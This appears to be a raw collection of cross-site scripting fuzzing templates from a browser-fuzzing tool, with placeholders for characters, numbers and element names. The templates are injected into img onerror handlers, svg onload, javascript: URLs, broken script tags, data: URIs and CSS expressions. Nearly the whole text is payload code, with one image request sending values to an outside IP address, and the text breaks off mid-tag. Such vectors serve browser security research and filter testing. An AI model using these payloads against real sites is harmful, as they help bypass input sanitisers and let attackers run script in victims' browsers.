<*chr*img src=xx:xx onerror=logChr(*num*)><*chr*img src=xx:xx onerror=logChr(*chr*)><xss *chr*onpointerrawupdate =alert(1) style=display:block>fuzzelement*num*</xss>*chr*img src=xx:xx *onerror=logChr(*num*)><a href="*chr*/google.com" id="fuzzelement*num*">a</a><img*chr*src=x onerror=logChr(*num*)><script>logChr(*num*)</*chr*script><script>logChr(*num*)<*chr*/script><a href="javascript*char*:logChr(*num*)">click me</a><script>logChr(*num*)<*chr*script> <script>logChr(*num*)<*chr*/script> <script>logChr(*num*)*chr*/script><*chr*><script>if (document.getElementsByTagName("*chr*").length > 0) {logChr(*num*)}</script><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><img src=xx:xx test='*chr*onerror=logChr(*num*)'><a href="javascript*chr*:alert(this.id)" id="fuzzelement*num*">test</a><!-- sample vector --> <img src=x onerror="&#x*chr*61lert(*num*);logChr(*num*);"><script> a=123*chr*b=444*chr*logChr(*num*) </script><script> a=123*chr*b=444*chr*logChr(*num*) </script><a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a><img id="fuzz*num*" src=x onerro*chr*r='xx'><a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a>*num**num*<!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*urlenc**hex4**raw2**chr**datahtmlelements2020**datajscsspropertynames**datamathelements**datasvgelements**dataShortHtmlElements*<script>logChr(*num*)</*chr*script><*datahtmlelements* src *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*><*datahtmlelements* src onerror="customLog('*datahtmlelements*')"></*datahtmlelements*><!-- sample vector --> <img src onerror*chr*=*chr*logChr(*num*)><!-- sample vector --> <img*chr*src*chr*onerror=logChr(*num*)><!-- sample vector --> <img src=//lel*chr*wtf/hey.jpg onload=logChr(*num*)><script> function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } document.write("<" + makeid(*num*) + " />") </script><script> function makeid(length) { var result = ''; var characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; var charactersLength = characters.length; for ( var i = 0; i < length; i++ ) { result += characters.charAt(Math.floor(Math.random() * charactersLength)); } return result; } doaument.write("<" + makeid(*num*) + " />") </script><script>var x = ''*chr*logChr(*num*)*chr*'';</script><!-- sample vector --> <script> logChr(*num*)*chr**chr* hax</script><img src*chr*x onerror*chr*logChr(*num*)><style></*chr*tyle><script>logChr(*num*)</script></style><style></s*chr*tyle><script>logChr(*num*)</script></style><img src=x onerror="l&#*chr*111;gChr(*num*)//" /><script> logChr(*num*)<*uni*script><script>logChr(*num*)<*raw1*script><*chr*img src=x onerror=logChr(*num*)><script> var uxss = document.createElement('uxss'); uxss.href = "http://naver.com/*chr*@google.com:443/"; if (uxss.href === "http://google.com") { logChr(*num*); } </script><a href="http://naver.com/*chr*@google.com:443/">*num*</a><script>prompt(*chr*);</script> <p>testcase:*num*</p><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><script>/*chr*/'</script><script>//</*datahtmlelements*> alert(1); </script><script><*datahtmlelements*>prompt(1)</*datahtmlelements*><a href="http://*chr*javascript:alert(1)" id="fuzzelement*num*">test</a><a href="*uni*javascript:alert(1)" id="fuzzelement*num*">test</a><a href="*uni*javascript:alert(1)" id="fuzzelement*num*">test</a><script>//</*datahtmlelements*> logChr(*num*); </script><!-- sample vector --> <script>var test = 'test*chr*;logChr(*num*);</script>*chr*>*chr*<*chr*img *chr*src=1 onerrror=logChr(*num*)*chr*>*chr* -->*chr*>*chr*<*chr*img *chr*src=1 onerrror=alert(1)*chr*>*chr* --><script>alert*chr*logChr(*num*)*chr*</script><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><script>a*uni**uni*lert(*chr*logChr(*num*))</script><*chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr*script>alert*raw1*(logChr(*num*))</script><>*chr*script*chr*+alert(logChr(*num*)) </script><script*chr*+>alert(logChr(*num*)) </script>*chr*><svg/*chr*onload*chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*><svg/*chr**datahtmlattributes**chr**chr**chr*=*chr**chr**chr*logChr(*num*)*raw1*><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <svg*chr**chr**chr**chr**chr*onload=logChr*chr**chr**num**chr**chr*><svg*chr**chr**chr**chr**chr**datahtmlattributes*=logChr*chr**chr**num**chr**chr*><!-- sample vector --> <*chr**chr**chr**chr*svg/*chr*onload=alert(*num*)*chr*><!-- sample vector --> <*chr**chr**chr**chr*svg/*chr*onload=alert(*num*)*chr*><!-- sample vector --> <*chr*img src='about:blank' onerror=logChr(*num*)><!-- sample vector --> <img src="xx:xx*chr*onerror=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=alert(*chr*)><!-- sample vector --> <img src=xx:xx onerror*chr*=logChr(*num*)><a href="http:*chr*//qq.com">aaa</a><IFRAME SRC="javascript*chr*logChr(*num*);"></IFRAME><a href="javascript*chr*logChr(*num*)">aaa</a><img src=x *chr*onError="javascript:log(*num*)"/><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <script xlink:href=data*chr*:,logChr(*num*)></script> </svg><img src on*chr*error=logChr(*num*)><img src="about:blank" onerror*chr*logChr(*num*)><img src*chr*"about:blank"><script> t = document.createElement('template'); t.innerHTML = '</*chr*<img src=xx:xx onerror=log(*num*)>'; document.body.appendChild(t); </script><!-- sample vector --> <img src=xx:xx onerro*chr*r=logChr(*num*)><img src=xx:xx *chr*onerror=logChr(*num*)><a id="fuzzelement*num*" href="javascript&col*chr*on;alert">aaa</a> <script> if(document.getElementById('fuzzelement*num*').protocol==='javascript:'){ logChr(*num*); } </script><*chr*img src=xx:xx onerror=alert(*chr*)><!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)><!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)><script> var testpad = document.createElement("iframe"); testpad.name="dummy"; document.body.appendChild(testpad); for(props in document){ testpad.name = props; if (document[props]+"" === "[object Window]") { customLog(props) } } </script><*datahtmlelements* name="cookie"></*datahtmlelements*> <script> window.addEventListener("load",function(){ for(a in document.cookie){ customLog(document.cookie[a].tagName); } },false); </script><form id='*datahtmlelements*1'> </form> <*datahtmlelements* id='*datahtmlelements*2' form='*datahtmlelements*1'></*datahtmlelements*> <script> if (document.getElementById('*datahtmlelements*2').form == '[object HTMLFormElement]') { customLog('*datahtmlelements*') } </script><script x=x*chr*src=data:,logChr(*num*)></script><img src="#*chr*data:image/gif;base64,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" onload="logChr(*num*)"><img src="#*chr*data:image/gif;base64,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"><script src=data:*chr*logChr(*num*)></script><a href="/*chr*google.com" id="fuzzelement*num*">asdf</a> <script> if(document.getElementById('fuzzelement*num*').hostname=="google.com") { logChr(*num*); } </script><!DOCTYPE html> <html lang = "en-US"> <head> <meta charset = "UTF-8"> <title>monty.html</title> <link rel = "stylesheet" type = "text/css" href = "monty.css" /> </head> <body> <h1>Monty Python Quiz</h1> <form action = "monty.php" method = "post"> <fieldset> <p> <label>What is your name?</label> <select name = "name"> <option value = "Roger"> Roger the Shrubber </option> <option value = "Arthur"> Arthur, King of the Britons </option> <option value = "Tim"> Tim the Enchanter </option> </select> </p> <p> <label>What is your quest?</label> <span> <input type = "radio" name = "quest" value = "herring" /> To chop down the mightiest tree in the forest with a herring </span> <span> <input type = "radio" name = "quest" value = "grail" /> I seek the holy grail. </span> <span> <input type = "radio" name = "quest" value = "shrubbery" /> I’m looking for a shrubbery. </span> </p> <p> <label>How can you tell she's a witch?</label> <span> <input type = "*raw3*" name = "*raw1*" value = "*raw2*"/> She's got a witch nose. </span> <span> <input type = "checkbox" name = "hat" value = "hat"/> She has a witch hat. </span> <span> <input type*chr**raw1*=*chr**raw1*"checkbox" name = "newt" value = "newt" /> *chr**chr**chr**chr**chr**raw1* </span> </p> <button type*chr**raw1*=*chr**raw1*"submit"> *chr**chr**chr**chr**chr**chr**raw1* </button> </fieldset> </form> </body> </html><script> var regexChars = /*chr*$/g if(!("*chr*$".match(regexChars))) { logChr(*num*) } </script><script> var regexChars = /[*chr*.]/g if(!(".".match(regexChars))) { logChr(*num*) } <script><table> <thead> <tr><td>*chr* *raw1*</td>*chr* *raw2*<td>*chr* *raw3*</td></tr> </thead> <tbody> <tr><td>*chr* *raw1*</td>*chr* *raw2*<td>*chr* *raw3*</td></tr> </tbody> </table>*urlenc**uni**hex6**hex4**hex2**chr**num**datacsspropertynames**datadhtmlprops**dataentities**dataevents**datahtmlattributes**datahtmlattributes**datahtmlattributes**datahtmlelements**datahtmlelements2**dataints**datajscsspropertynames**datajsproperties**datajstest**datajstest3**datajstest4**datajstest5**datamathelements**datamyevents**dataprotocols**dataShortHtmlAttributes**dataShortHtmlElements**datasvgelements*<!-- sample vector --> <link rel="canonical" href="http://example.com/path/test"><img*chr*src="xx:xx"onerror="logChr(*num*)"><!-- sample vector --> <*hex2**hex4**hex6**num**chr**urlenc**uni*><div *chr*="><img src=xss:xss onerror=logChr(*num*)>"><a href="http://*chr*/" id="fuzzelement*num*">test</a><a href="http://*chr*/" id="fuzzelement*num*">test</a><iframe src="http://*chr*fuzz.shazzer.co.uk//" onload="if(this.contentWindow.document !== null){log(*num*)}"></iframe><iframe src="http:/*chr*/google.de"></iframe><iframe src="....................................................................................................................................................................................................................:::::::::::::::::::::.................................................................................................."></iframe>*chr*<iframe src="http*uni*//www.google.de"></iframe><iframe src="http://*uni*"></iframe><iframe src="*uni*://www.w3schools.com"></iframe> <iframe src="*hex6*://www.w3schools.com"></iframe><frameset cols="200, *"> <frame src="*hex6*:" name="navigation"> <frame src="*uni*:" name="inhalt"> </frameset><script>window.open("*num**hex2**uni*://www.w3schools.com");</script><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><script>l*chr*u006fg(*num*)</script><script>lu006f*chr*g(*num*)</script><svg toto="*chr* onload="logChr(*num*);"></svg><div id="fuzzelement*num*" style="background:url(about:blank?*chr*;color:#000000;x:);"></div><script*chr*test>logChr(*num*)</script><*chr*div style="x:expression(logChr(*num*))"><script>a='asdf*chr*';logChr(*num*)//asdf'</script><html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html><*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script><!-- sample vector --> <img src=http://www.kinmen.gov.tw/*chr* onerror=logChr(*num*)><input value=""*dataevents* =customLog('*dataevents*') " type="text"><script>s*num* = *chr**num**chr*;if (typeof s*num* == "string" && s*num* == "*num*") logChr(*num*);</script><!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)><img src=xx:xx *chr*nerror=logChr(*num*)><script*chr*logChr(*num*)</script><img src=xx:xx onerror*chr*logChr(*num*)><img src=xx:xx onerror*chr*logChr(*num*)><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --><script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script><script> var v = {}*chr*{"string in blockscope"} logChr(*num*) </script><script> var v = {}*chr*logChr(*num*) </script><a href="javascript://*chr*logChr(*num*)">aaa</a><img src="about:blank" onerror*chr*=logChr(*num*)><input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"><input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"><script> *chr*"; logChr(*num*) </script><script> // hmm *chr*logChr(*num*) </script><script> var a = document.createElement('a'); a.href = "javau*hex4*script:alert()"; if (a.href === "javascript:alert()") { logChr(*num*); } </script><input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"><*chr*img/src=xx:xx on*chr*error=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*chr*img src=xx:xx onerror=logChr(*num*)><!--*chr*><img src=xxx:x onerror=log(*num*)> --><script> var a = "olol123*chr* <logChr(*num*)// </script><svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg><*chr*,script>logChr(*num*);</script><!-- sample vector --> <img src='xx:xx*chr*' onerror='logChr(*num*) baz= '><script> var a={}*chr*b={}&logChr(*num*); </script><object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object><script> var a={}*chr*b=logChr(*num*); </script><script> var a={}*chr*logChr(*num*); </script><!-- sample vector --> <img src=xx:xx onerror=logChr(*num*)*chr*"><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a><script src="data*chr*,log(*num*)"></script><script>logChr(*num*)<*chr*script></script><div style="x:expression(l&*chr*#x6F;gChr(*num*))"><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><img src=http://runinfinity.com/wp-content/uploads/2012/01/Kinmen_Marathon_coursemap.jpg *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)><img src=xx:xx *chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr**chr* onerror=logChr(*num*)><article onerror=log(*num*) data-animal-type="bird"> <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article><article onerror=log(*num*) > <h1>k1nm3n h@ck3r</h1> <p>test</p> <table> <tr><td>datacsspropertynames</td><td>*datacsspropertynames*</td></tr> <tr><td>datadhtmlprops</td><td>*datadhtmlprops*</td></tr> <tr><td>dataentities</td><td>*dataentities*</td></tr> <tr><td>dataevents</td><td>*dataevents*</td></tr> <tr><td>dataevil</td><td>*dataevil*</td></tr> <tr><td>datahtmlattributes</td><td>*datahtmlattributes*</td></tr> <tr><td>datahtmlelements</td><td>*datahtmlelements*</td></tr> <tr><td>datahtmlelements2</td><td>*datahtmlelements2*</td></tr> <tr><td>dataints</td><td>*dataints*</td></tr> <tr><td>datajscsspropertynames</td><td>*datajscsspropertynames*</td></tr> <tr><td>datajsproperties</td><td>*datajsproperties*</td></tr> <tr><td>datajstest</td><td>*datajstest*</td></tr> <tr><td>datajstest2</td><td>*datajstest2*</td></tr> <tr><td>datajstest3</td><td>*datajstest3*</td></tr> <tr><td>datajstest4</td><td>*datajstest4*</td></tr> <tr><td>datajstest5</td><td>*datajstest5*</td></tr> <tr><td>datamyevents</td><td>*datamyevents*</td></tr> <tr><td>dataprotocols</td><td>*dataprotocols*</td></tr> <tr><td>dataShortHtmlAttributes</td><td>*dataShortHtmlAttributes*</td></tr> <tr><td>dataShortHtmlElements</td><td>*dataShortHtmlElements*</td></tr> <tr><td>datasvgelements</td><td>*datasvgelements*</td></tr> </table> </article><img src="http://140.134.25.107/?chr=*chr*&num=*num*" onerror=logChr(*num*)><svg*chr*onload=logChr(*num*)><script>/^d$/.test('*chr*')&&logChr(*num*);</script><script> if(/s/.test('*uni*')&&!/./.test('*uni*'))logChr(*num*) </script><script> if(/s/.test('*chr*'))logChr(*num*) </script><script language="vbscript"> '*chr*log(*num*)' </script><body onload=throw[onerror=a=*chr*logChr(*num*),a]><input onfocus=*chr*:alert(1) autofocus><a href="http://*chr*javascript:alert(1)">testxss</a><img src== onerror="a*chr*logChr(*num*)"><progress value="*num*" max="*num*"></progress><*chr* width="*num*px">*datajstest4**datajstest4**datajstest4**dataShortHtmlAttributes**dataShortHtmlAttributes**dataShortHtmlAttributes**datajstest4*<img src=xx:xx o*chr*nerror=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)><!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*num**datajstest4**datacsspropertynames**datacsspropertynames*<script> *chr*"; logChr(*num*); </script><a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a><a href="http://*chr*google.com" id="fuzzelement*num*">test</a><ifr*chr*ame id="lol*num*" src="http://shazzer.co.uk" onload=logChr(*num*);> <i>:)</i> </iframe><script> function report*num*(num){ var lol = document.getElementById('lol*num*'); if(/http://shazzer/.test(lol.src)){ logChr(*num*); } } </script> <iframe id="lol*num*" src="http://*chr*shazzer.co.uk" onload=report*num*(*num*)> <p>The browser does not support iframes.</p> </iframe><command 